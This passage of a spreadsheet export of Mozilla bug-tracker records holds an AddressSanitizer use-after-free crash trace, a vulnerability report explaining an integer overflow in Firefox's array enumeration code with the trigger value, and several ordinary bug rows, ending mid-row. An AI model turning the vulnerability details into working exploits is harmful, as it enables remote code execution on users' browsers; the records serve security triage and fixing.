    #23 0x7f6d97537f46 in js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) firefox/aurora/js/src/jsinterp.cpp:535
    #24 0x7f6d96e6d1d0 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) firefox/aurora/js/src/jsinterp.h:172
    #25 0x7f6d9753e0ab in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) firefox/aurora/js/src/jsinterp.cpp:567
    #26 0x7f6d96d15aff in JS_CallFunctionValue firefox/aurora/js/src/jsapi.cpp:5416
    #27 0x7f6d8e7f6d29 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) firefox/aurora/js/xpconnect/src/XPCWrappedJSClass.cpp:1509
    #28 0x7f6d8e79f328 in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) firefox/aurora/js/xpconnect/src/XPCWrappedJS.cpp:617
    #29 0x7f6d92af2800 in PrepareAndDispatch firefox/aurora/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:153
    #30 0x7f6d92aeff97 in SharedStub firefox/aurora/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
    #31 0x7f6d8aad1759 in nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsIDOMEventTarget*, unsigned int, nsCxPusher*) firefox/aurora/content/events/src/nsEventListenerManager.cpp:818
    #32 0x7f6d8aad2b78 in nsEventListenerManager::HandleEventInternal(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) firefox/aurora/content/events/src/nsEventListenerManager.cpp:875
    #33 0x7f6d8ac5bdc7 in nsEventListenerManager::HandleEvent(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) firefox/aurora/content/events/src/nsEventListenerManager.h:170
    #34 0x7f6d8ac4a1b6 in nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, unsigned int, bool, nsCxPusher*) firefox/aurora/content/events/src/nsEventDispatcher.cpp:218
    #35 0x7f6d8ac47d0c in nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&amp;, unsigned int, nsDispatchingCallback*, bool, nsCxPusher*) firefox/aurora/content/events/src/nsEventDispatcher.cpp:346
    #36 0x7f6d8ac4dbb4 in nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;nsIDOMEventTarget&gt;*) firefox/aurora/content/events/src/nsEventDispatcher.cpp:679
    #37 0x7f6d8854f2bf in DocumentViewerImpl::LoadComplete(unsigned int) firefox/aurora/layout/base/nsDocumentViewer.cpp:1071
    #38 0x7f6d8f6477f3 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, unsigned int) firefox/aurora/docshell/base/nsDocShell.cpp:6200
    #39 0x7f6d8f63f601 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, unsigned int) firefox/aurora/docshell/base/nsDocShell.cpp:6031
    #40 0x7f6d8f6407e5 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, unsigned int) firefox/aurora/modules/zlib/src/gzlib.c:0
    #41 0x7f6d8f73ff04 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, unsigned int) firefox/aurora/uriloader/base/nsDocLoader.cpp:1384
    #42 0x7f6d8f73d915 in nsDocLoader::doStopDocumentLoad(nsIRequest*, unsigned int) firefox/aurora/uriloader/base/nsDocLoader.cpp:962
    #43 0x7f6d8f736aa8 in nsDocLoader::DocLoaderIsEmpty(bool) firefox/aurora/uriloader/base/nsDocLoader.cpp:854
    #44 0x7f6d8f73b0cc in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) firefox/aurora/uriloader/base/nsDocLoader.cpp:736
    #45 0x7f6d8f73cc3d in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) firefox/aurora/modules/zlib/src/gzlib.c:0
    #46 0x7f6d86e83279 in nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, unsigned int) firefox/aurora/netwerk/base/src/nsLoadGroup.cpp:731
    #47 0x7f6d89f98714 in nsDocument::DoUnblockOnload() firefox/aurora/content/base/src/nsDocument.cpp:7278
    #48 0x7f6d89f98191 in nsDocument::UnblockOnload(bool) firefox/aurora/content/base/src/nsDocument.cpp:7221
    #49 0x7f6d89f48e94 in nsDocument::DispatchContentLoadedEvents() firefox/aurora/content/base/src/nsDocument.cpp:4271
    #50 0x7f6d8a002c69 in nsRunnableMethodImpl&lt;void (nsDocument::*)(), true&gt;::Run() firefox/aurora/../../../dist/include/nsThreadUtils.h:345
    #51 0x7f6d929e530e in nsThread::ProcessNextEvent(bool, bool*) firefox/aurora/xpcom/threads/nsThread.cpp:657
    #52 0x7f6d926733fd in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/aurora/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:245
    #53 0x7f6d91a65146 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/aurora/ipc/glue/MessagePump.cpp:110
    #54 0x7f6d92c9ca8a in MessageLoop::RunInternal() firefox/aurora/ipc/chromium/src/base/message_loop.cc:209
    #55 0x7f6d92c9c8d3 in MessageLoop::RunHandler() firefox/aurora/ipc/chromium/src/base/message_loop.cc:202
    #56 0x7f6d92c9c7b8 in MessageLoop::Run() firefox/aurora/ipc/chromium/src/base/message_loop.cc:176
    #57 0x7f6d90fabbde in nsBaseAppShell::Run() firefox/aurora/widget/xpwidgets/nsBaseAppShell.cpp:191
    #58 0x7f6d8fbd5c88 in nsAppStartup::Run() firefox/aurora/toolkit/components/startup/nsAppStartup.cpp:295
    #59 0x7f6d86c63fb2 in XREMain::XRE_mainRun() firefox/aurora/toolkit/xre/nsAppRunner.cpp:3780
    #60 0x7f6d86c6a112 in XREMain::XRE_main(int, char**, nsXREAppData const*) firefox/aurora/toolkit/xre/nsAppRunner.cpp:3857
    #61 0x7f6d86c6d5c8 in XRE_main firefox/aurora/toolkit/xre/nsAppRunner.cpp:3933
    #62 0x40a7a3 in do_main(int, char**) firefox/aurora/browser/app/nsBrowserApp.cpp:190
    #63 0x40832e in main firefox/aurora/browser/app/nsBrowserApp.cpp:277
0x7f6d5ecb0b90 is located 16 bytes inside of 128-byte region [0x7f6d5ecb0b80,0x7f6d5ecb0c00)
freed by thread T0 here:
    #0 0x4a4272 in free ??:0
    #1 0x7f6d9e6ad673 in moz_free firefox/aurora/memory/mozalloc/mozalloc.cpp:82
    #2 0x7f6d8e48199f in ~nsAutoPtr firefox/aurora/../../dist/include/nsAutoPtr.h:106
    #3 0x7f6d8e46cf13 in ~nsAutoPtr firefox/aurora/../../dist/include/nsAutoPtr.h:106
    #4 0x7f6d8e480913 in nsTArrayElementTraits&lt;nsAutoPtr&lt;nsSMILTimeValueSpec&gt; &gt;::Destruct(nsAutoPtr&lt;nsSMILTimeValueSpec&gt;*) firefox/aurora/../../dist/include/nsTArray.h:381
    #5 0x7f6d8e480578 in nsTArray&lt;nsAutoPtr&lt;nsSMILTimeValueSpec&gt;, nsTArrayDefaultAllocator&gt;::DestructRange(unsigned int, unsigned int) firefox/aurora/../../dist/include/nsTArray.h:1242
    #6 0x7f6d8e480007 in nsTArray&lt;nsAutoPtr&lt;nsSMILTimeValueSpec&gt;, nsTArrayDefaultAllocator&gt;::RemoveElementsAt(unsigned int, unsigned int) firefox/aurora/../../dist/include/nsTArray.h:964
    #7 0x7f6d8e46d03f in nsTArray&lt;nsAutoPtr&lt;nsSMILTimeValueSpec&gt;, nsTArrayDefaultAllocator&gt;::Clear() firefox/aurora/../../dist/include/nsTArray.h:975
    #8 0x7f6d8e46825c in nsSMILTimedElement::ClearSpecs(nsTArray&lt;nsAutoPtr&lt;nsSMILTimeValueSpec&gt;, nsTArrayDefaultAllocator&gt;&amp;, nsTArray&lt;nsRefPtr&lt;nsSMILInstanceTime&gt;, nsTArrayDefaultAllocator&gt;&amp;, bool (*)(nsSMILInstanceTime*)) firefox/aurora/content/smil/nsSMILTimedElement.cpp:1331
    #9 0x7f6d8e4611a0 in nsSMILTimedElement::UnsetEndSpec(bool (*)(nsSMILInstanceTime*)) firefox/aurora/content/smil/nsSMILTimedElement.cpp:904
    #10 0x7f6d8e465f36 in nsSMILTimedElement::UnsetAttr(nsIAtom*) firefox/aurora/content/smil/nsSMILTimedElement.cpp:854
    #11 0x7f6d8e337423 in nsSVGAnimationElement::UnsetAttr(int, nsIAtom*, bool) firefox/aurora/content/svg/content/src/nsSVGAnimationElement.cpp:411
    #12 0x7f6d8a157d03 in nsGenericElement::RemoveAttribute(nsAString_internal const&amp;) firefox/aurora/content/base/src/nsGenericElement.cpp:2746
    #13 0x7f6d8e2fd108 in nsSVGAnimateElement::RemoveAttribute(nsAString_internal const&amp;) firefox/aurora/content/svg/content/src/nsSVGAnimateElement.cpp:60
    #14 0x7f6d8e9b9aca in nsIDOMElement_RemoveAttribute(JSContext*, unsigned int, JS::Value*) firefox/aurora/objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:3961
    #15 0x7f6d97537821 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), js::CallArgs const&amp;) firefox/aurora/js/src/jscntxtinlines.h:314
    #16 0x7f6d9749e1cd in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) firefox/aurora/js/src/jsinterp.cpp:2757
    #17 0x7f6d9741e085 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) firefox/aurora/js/src/jsinterp.cpp:475
    #18 0x7f6d97537f46 in js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) firefox/aurora/js/src/jsinterp.cpp:535
    #19 0x7f6d96e6d1d0 in js::Invoke(JSContext*, js::InvokeArgsGuard&amp;, js::MaybeConstruct) firefox/aurora/js/src/jsinterp.h:172
    #20 0x7f6d9753e0ab in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) firefox/aurora/js/src/jsinterp.cpp:567
    #21 0x7f6d96d15aff in JS_CallFunctionValue firefox/aurora/js/src/jsapi.cpp:5416
    #22 0x7f6d8e7f6d29 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) firefox/aurora/js/xpconnect/src/XPCWrappedJSClass.cpp:1509
    #23 0x7f6d8e79f328 in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) firefox/aurora/js/xpconnect/src/XPCWrappedJS.cpp:617
    #24 0x7f6d92af2800 in PrepareAndDispatch firefox/aurora/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:153
    #25 0x7f6d92aeff97 in SharedStub firefox/aurora/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:0
    #26 0x7f6d8aad1759 in nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsIDOMEventTarget*, unsigned int, nsCxPusher*) firefox/aurora/content/events/src/nsEventListenerManager.cpp:818
    #27 0x7f6d8aad2b78 in nsEventListenerManager::HandleEventInternal(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) firefox/aurora/content/events/src/nsEventListenerManager.cpp:875
    #28 0x7f6d8ac5bdc7 in nsEventListenerManager::HandleEvent(nsPresContext*, nsEvent*, nsIDOMEvent**, nsIDOMEventTarget*, unsigned int, nsEventStatus*, nsCxPusher*) firefox/aurora/content/events/src/nsEventListenerManager.h:170
    #29 0x7f6d8ac4a1b6 in nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, unsigned int, bool, nsCxPusher*) firefox/aurora/content/events/src/nsEventDispatcher.cpp:218
previously allocated by thread T0 here:
    #0 0x4a4332 in malloc ??:0
    #1 0x7f6d9e6ad7c7 in moz_xmalloc firefox/aurora/memory/mozalloc/mozalloc.cpp:87
    #2 0x7f6d8e4676ed in nsSMILTimedElement::SetBeginOrEndSpec(nsAString_internal const&amp;, mozilla::dom::Element*, bool, bool (*)(nsSMILInstanceTime*)) firefox/aurora/content/smil/nsSMILTimedElement.cpp:1290
    #3 0x7f6d8e461779 in nsSMILTimedElement::SetEndSpec(nsAString_internal const&amp;, mozilla::dom::Element*, bool (*)(nsSMILInstanceTime*)) firefox/aurora/content/smil/nsSMILTimedElement.cpp:897
    #4 0x7f6d8e461e32 in nsSMILTimedElement::SetAttr(nsIAtom*, nsAString_internal const&amp;, nsAttrValue&amp;, mozilla::dom::Element*, unsigned int*) firefox/aurora/content/smil/nsSMILTimedElement.cpp:816
    #5 0x7f6d8e335a4d in nsSVGAnimationElement::ParseAttribute(int, nsIAtom*, nsAString_internal const&amp;, nsAttrValue&amp;) firefox/aurora/content/svg/content/src/nsSVGAnimationElement.cpp:360
    #6 0x7f6d8a193883 in nsGenericElement::SetAttr(int, nsIAtom*, nsIAtom*, nsAString_internal const&amp;, bool) firefox/aurora/content/base/src/nsGenericElement.cpp:5261
    #7 0x7f6d8b68a3fb in nsXMLContentSink::AddAttributes(unsigned short const**, nsIContent*) firefox/aurora/content/xml/document/src/nsXMLContentSink.cpp:1502
    #8 0x7f6d8b67c81f in nsXMLContentSink::HandleStartElement(unsigned short const*, unsigned short const**, unsigned int, int, unsigned int, bool) firefox/aurora/content/xml/document/src/nsXMLContentSink.cpp:1056
    #9 0x7f6d8b67b02b in nsXMLContentSink::HandleStartElement(unsigned short const*, unsigned short const**, unsigned int, int, unsigned int) firefox/aurora/content/xml/document/src/nsXMLContentSink.cpp:980
    #10 0x7f6d8b67dd8d in non-virtual thunk to nsXMLContentSink::HandleStartElement(unsigned short const*, unsigned short const**, unsigned int, int, unsigned int) firefox/aurora/modules/zlib/src/gzlib.c:0
    #11 0x7f6d87c3f3d1 in nsExpatDriver::HandleStartElement(unsigned short const*, unsigned short const**) firefox/aurora/parser/htmlparser/src/nsExpatDriver.cpp:411
    #12 0x7f6d87c582a7 in Driver_HandleStartElement(void*, unsigned short const*, unsigned short const**) firefox/aurora/parser/htmlparser/src/nsExpatDriver.cpp:95
    #13 0x7f6d87d9c17a in doContent firefox/aurora/parser/expat/lib/xmlparse.c:2387
    #14 0x7f6d87d81499 in contentProcessor firefox/aurora/parser/expat/lib/xmlparse.c:2043
    #15 0x7f6d87d66c09 in doProlog firefox/aurora/parser/expat/lib/xmlparse.c:4024
    #16 0x7f6d87d61b82 in prologProcessor firefox/aurora/parser/expat/lib/xmlparse.c:3758
    #17 0x7f6d87dcf1f1 in prologInitProcessor firefox/aurora/parser/expat/lib/xmlparse.c:3575
    #18 0x7f6d87d46a01 in MOZ_XML_Parse firefox/aurora/parser/expat/lib/xmlparse.c:1520
    #19 0x7f6d87c51694 in nsExpatDriver::ParseBuffer(unsigned short const*, unsigned int, bool, unsigned int*) firefox/aurora/parser/htmlparser/src/nsExpatDriver.cpp:1020
    #20 0x7f6d87c52a93 in nsExpatDriver::ConsumeToken(nsScanner&amp;, bool&amp;) firefox/aurora/parser/htmlparser/src/nsExpatDriver.cpp:1121
    #21 0x7f6d87c54a62 in non-virtual thunk to nsExpatDriver::ConsumeToken(nsScanner&amp;, bool&amp;) firefox/aurora/modules/zlib/src/gzlib.c:0
    #22 0x7f6d87ce9a2b in nsParser::Tokenize(bool) firefox/aurora/parser/htmlparser/src/nsParser.cpp:2275
==26824== ABORTING
Stats: 132M malloced (146M for red zones) by 322256 calls
Stats: 40M realloced by 18232 calls
Stats: 103M freed by 211052 calls
Stats: 0M really freed by 0 calls
Stats: 312M (79916 full pages) mmaped in 78 calls
  mmaps   by size class: 8:262128; 9:49146; 10:16380; 11:16376; 12:2048; 13:2048; 14:1536; 15:384; 16:512; 17:128; 18:96; 19:56; 20:16;
  mallocs by size class: 8:245743; 9:42218; 10:13971; 11:14225; 12:2028; 13:1650; 14:1384; 15:271; 16:505; 17:105; 18:94; 19:49; 20:13;
  frees   by size class: 8:150073; 9:33717; 10:11296; 11:11665; 12:1405; 13:825; 14:1204; 15:230; 16:438; 17:92; 18:52; 19:45; 20:10;
  rfrees  by size class:
Stats: malloc large: 261 small slow: 1663
Shadow byte and word:
  0x1fedabd96172: fd
  0x1fedabd96170: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fedabd96150: fd fd fd fd fd fd fd fd
  0x1fedabd96158: fd fd fd fd fd fd fd fd
  0x1fedabd96160: fa fa fa fa fa fa fa fa
  0x1fedabd96168: fa fa fa fa fa fa fa fa
=&gt;0x1fedabd96170: fd fd fd fd fd fd fd fd
  0x1fedabd96178: fd fd fd fd fd fd fd fd
  0x1fedabd96180: fa fa fa fa fa fa fa fa
  0x1fedabd96188: fa fa fa fa fa fa fa fa
  0x1fedabd96190: fd fd fd fd fd fd fd fd</t>
        </is>
      </c>
      <c r="X798" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="799">
      <c r="A799" t="n">
        <v>599468</v>
      </c>
      <c r="B799" t="inlineStr">
        <is>
          <t>2010-09-24 13:02:35 -0700</t>
        </is>
      </c>
      <c r="C799" t="inlineStr">
        <is>
          <t>NewIdArray Integer Overflow Remote Code Execution Vulnerability (ZDI-CAN-884)</t>
        </is>
      </c>
      <c r="D799" t="inlineStr">
        <is>
          <t>2011-01-27 17:22:34 -0800</t>
        </is>
      </c>
      <c r="E799" t="n">
        <v>1</v>
      </c>
      <c r="F799" t="n">
        <v>1</v>
      </c>
      <c r="G799" t="n">
        <v>3</v>
      </c>
      <c r="H799" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I799" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J799" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K799" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L799" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M799" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N799" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O799" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P799" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q799" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R799" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S799" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T799" t="n">
        <v>1</v>
      </c>
      <c r="U799" t="n">
        <v>0</v>
      </c>
      <c r="V799" t="n">
        <v>20</v>
      </c>
      <c r="W799" t="inlineStr">
        <is>
          <t>Created attachment 478372
PoC
ZDI-CAN-884: Mozilla Firefox NewIdArray Integer Overflow Remote Code Execution Vulnerability
-- CVSS ----------------------------------------------------------------
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)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Firefox's management of the
JSSLOT_ARRAY_COUNT annotation. This value represents the number of items
filled within a given Array object. If an attacker creates an array to a
high enough value, an initialization routine can be made to mis-allocate
a buffer. This can be abused by an attacker to corrupt memory and
subsequently execute arbitrary code under the context of the user
running the browser.
Version(s)  tested: Mozilla Firefox 3.6.6
Platform(s) tested: Windows XP SP3 x86
The value associated with JSSLOT_ARRAY_COUNT (below as
"num_properties") is being used during the initialization phase of array
content enumeration. From js/src/jsapi.cpp:
JS_Enumerate(JSContext *cx, JSObject *obj) {
    jsint i, n;
    jsval iter_state, num_properties;
    jsid id;
    JSIdArray *ida;
    jsval *vector;
    ...
    /* Get the number of properties to enumerate. */
    if (!obj-&gt;enumerate(cx, JSENUMERATE_INIT, &amp;iter_state,
&amp;num_properties))
        goto error;
    ...
    n = JSVAL_TO_INT(num_properties);
    ...
    /* Create an array of jsids large enough to hold all the properties
*/
    ida = NewIdArray(cx, n);
    if (!ida)
        goto error;
    i = 0;
    vector = &amp;ida-&gt;vector[0];
    for (;;) {
        if (!obj-&gt;enumerate(cx, JSENUMERATE_NEXT, &amp;iter_state, &amp;id))
            goto error;
        ...
        vector[i++] = id;
    }
    ...
}
So let's assume that num_properties = 0x3fffffff.
NewIdArray(JSContext *cx, jsint length)
{
    JSIdArray *ida;
    ida = (JSIdArray *)
        cx-&gt;malloc(offsetof(JSIdArray, vector) + length *
sizeof(jsval));
    if (ida)
        ida-&gt;length = length;
    return ida;
}
For offsetof(JSIdArray, vector) = 4, length = 0x3fffffff and
sizeof(jsval) = 4 (32-bit x86) integer overflows and cx-&gt;malloc(0) call
is made. Next,
ida-&gt;length is set to huge positive value.
Coming back to JS_Enumerate we can see that 0-byte long vector array
will be overflown by indices values resulting in memory corruption.
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X799" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="800">
      <c r="A800" t="n">
        <v>1532806</v>
      </c>
      <c r="B800" t="inlineStr">
        <is>
          <t>2019-03-05 14:52:58 -0800</t>
        </is>
      </c>
      <c r="C800" t="inlineStr">
        <is>
          <t>Exploratory analysis of Alexa 1 million sites using TLS v1.0 / 1.1 (approx ~3500 sites)</t>
        </is>
      </c>
      <c r="D800" t="inlineStr">
        <is>
          <t>2019-07-16 10:35:49 -0700</t>
        </is>
      </c>
      <c r="E800" t="n">
        <v>1</v>
      </c>
      <c r="F800" t="n">
        <v>1</v>
      </c>
      <c r="G800" t="n">
        <v>5</v>
      </c>
      <c r="H800" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I800" t="inlineStr">
        <is>
          <t>Data Science</t>
        </is>
      </c>
      <c r="J800" t="inlineStr">
        <is>
          <t>Investigation</t>
        </is>
      </c>
      <c r="K800" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L800" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M800" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N800" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O800" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P800" t="inlineStr"/>
      <c r="Q800" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R800" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S800" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T800" t="n">
        <v>1</v>
      </c>
      <c r="U800" t="n">
        <v>0</v>
      </c>
      <c r="V800" t="n">
        <v>12</v>
      </c>
      <c r="W800" t="inlineStr">
        <is>
          <t>Brief description of the request:
See https://blog.mozilla.org/security/2018/10/15/removing-old-versions-of-tls/ for more context.
We're trying to find the most efficient ways to contact the ~3500 or so sites in the "carnage.txt" (see below) file and let them know that TLS 1.0/1.1 will be disabled in March 2020, with the hopes they can upgrade in time.
Note: there's ~7k sites in the list, but approx 3500 eTLD+1.
Ideally, we would like to find as many related clusters of shared attributes or "choke points" as possible to help us be efficient in our outreach efforts.
For example, knowing the following info would be helpful:
Who is issuing their SSL certificates?
Who is hosting these sites?
What server and version are they running on?
What's the tech stack (to the extent we can get this -- builtwith.com seems to be able to do this?)
What countries are they coming from?
What industries do they map to? (education, ecommerce, media, etc.)
Anything else that seems useful or relevant.
Link to any assets:
http://tlscanary-plot2-6c61c12cb13f0abf.elb.us-west-2.amazonaws.com/carnage.txt
Is there a specific data scientist you would like or someone who has helped to triage this request:
No.</t>
        </is>
      </c>
      <c r="X800" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="801">
      <c r="A801" t="n">
        <v>1837686</v>
      </c>
      <c r="B801" t="inlineStr">
        <is>
          <t>2023-06-09 13:27:53 -0700</t>
        </is>
      </c>
      <c r="C801" t="inlineStr">
        <is>
          <t>Call instruction in try is ignored by alias analysis</t>
        </is>
      </c>
      <c r="D801" t="inlineStr">
        <is>
          <t>2024-06-02 11:56:49 -0700</t>
        </is>
      </c>
      <c r="E801" t="n">
        <v>1</v>
      </c>
      <c r="F801" t="n">
        <v>1</v>
      </c>
      <c r="G801" t="n">
        <v>3</v>
      </c>
      <c r="H801" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I801" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J801" t="inlineStr">
        <is>
          <t>JavaScript: WebAssembly</t>
        </is>
      </c>
      <c r="K801" t="inlineStr">
        <is>
          <t>Firefox 114</t>
        </is>
      </c>
      <c r="L801" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M801" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N801" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O801" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P801" t="inlineStr">
        <is>
          <t xml:space="preserve"> [adv-main116+] [adv-ESR115.1+] [adv-ESR102.14+]</t>
        </is>
      </c>
      <c r="Q801" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R801" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S801" t="inlineStr">
        <is>
          <t>117 Branch</t>
        </is>
      </c>
      <c r="T801" t="n">
        <v>1</v>
      </c>
      <c r="U801" t="n">
        <v>0</v>
      </c>
      <c r="V801" t="n">
        <v>49</v>
      </c>
      <c r="W801" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Steps to reproduce:
1. Open https://dos.zone/digger-may-06-1999/
2. Select emulation backend dosboxX
3. Press Play button
Actual results:
The game stuck at the beginning, with exception:
RuntimeError: unreachable executed
Expected results:
The game should work fine.
--
I am the creator of the js-dos project, and version 8 is almost ready to be released. However, Firefox is the only browser that does not work properly with the dosbox-x backend. The dosbox-x backend utilizes a new exception-handling feature of WebAssembly.
I cannot delay the release for an extended period of time. I can provide any additional information that you may need. It would be unfortunate if, in the end, I am forced to state that Firefox is not supported.</t>
        </is>
      </c>
      <c r="X801" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="802">
      <c r="A802" t="n">
        <v>97895</v>
      </c>
      <c r="B802" t="inlineStr">
        <is>
          <t>2001-08-31 21:08:46 -0700</t>
        </is>
      </c>
      <c r="C802" t="inlineStr">
        <is>
          <t>Old page gets repainted when leaving a page (Back and Forward performance)</t>
        </is>
      </c>
      <c r="D802" t="inlineStr">
        <is>
          <t>2001-10-31 12:50:33 -0800</t>
        </is>
      </c>
      <c r="E802" t="n">
        <v>1</v>
      </c>
      <c r="F802" t="n">
        <v>1</v>
      </c>
      <c r="G802" t="n">
        <v>3</v>
      </c>
      <c r="H802" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I802" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J802" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K802" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L802" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M802" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N802" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O802" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P802" t="inlineStr"/>
      <c r="Q802" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R802" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S802" t="inlineStr">
        <is>
          <t>mozilla0.9.6</t>
        </is>
      </c>
      <c r="T802" t="n">
        <v>1</v>
      </c>
      <c r="U802" t="n">
        <v>0</v>
      </c>
      <c r="V802" t="n">
        <v>44</v>
      </c>
      <c r="W802" t="inlineStr">
        <is>
          <t>One reason for our poor back/forward performance is probably that we redraw the 
entire old page when leaving it, when the user clicks on a link, or goes Forward 
or Back, or even Reloads. This is easy to show by editing a local page, and doing 
a Reload; the page is redrawn once with the old source, then again with the new 
source. It's obvious to see if double buffering is turned off.</t>
        </is>
      </c>
      <c r="X802" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="803">
      <c r="A803" t="n">
        <v>1311407</v>
      </c>
      <c r="B803" t="inlineStr">
        <is>
          <t>2016-10-19 07:59:11 -0700</t>
        </is>
      </c>
      <c r="C803" t="inlineStr">
        <is>
          <t>Add tippy top sites icon package to binary for rendering higher quality popular sites for Activity Stream</t>
        </is>
      </c>
      <c r="D803" t="inlineStr">
        <is>
          <t>2017-03-13 10:38:26 -0700</t>
        </is>
      </c>
      <c r="E803" t="n">
        <v>1</v>
      </c>
      <c r="F803" t="n">
        <v>1</v>
      </c>
      <c r="G803" t="n">
        <v>2</v>
      </c>
      <c r="H803" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I803" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J803" t="inlineStr">
        <is>
